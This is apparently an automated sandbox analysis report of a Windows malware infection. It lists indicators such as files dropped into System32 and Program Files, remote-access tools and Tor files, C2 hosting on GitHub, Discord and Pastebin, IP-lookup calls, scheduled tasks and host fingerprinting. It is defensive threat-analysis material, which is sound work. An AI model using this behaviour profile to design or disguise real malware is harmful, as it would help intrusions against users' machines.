File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\ruts\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\devtun\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe N/A
File opened for modification C:\Windows\System32\Tasks\MicrosoftProfile C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\11.reg C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\rutserv.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\boleto C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\xda C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\rfusclient.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\libeay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\rutssvc64 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\devtun\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus C:\Windows\System32\dllhost.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
File created C:\Windows\Installer\e5a7e3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5a7e3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133785014365216070" C:\Windows\System32\svchost.exe N/A
